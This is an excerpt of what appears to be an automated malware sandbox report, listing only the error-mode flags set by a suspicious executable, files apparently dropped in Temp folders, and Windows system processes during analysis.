Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
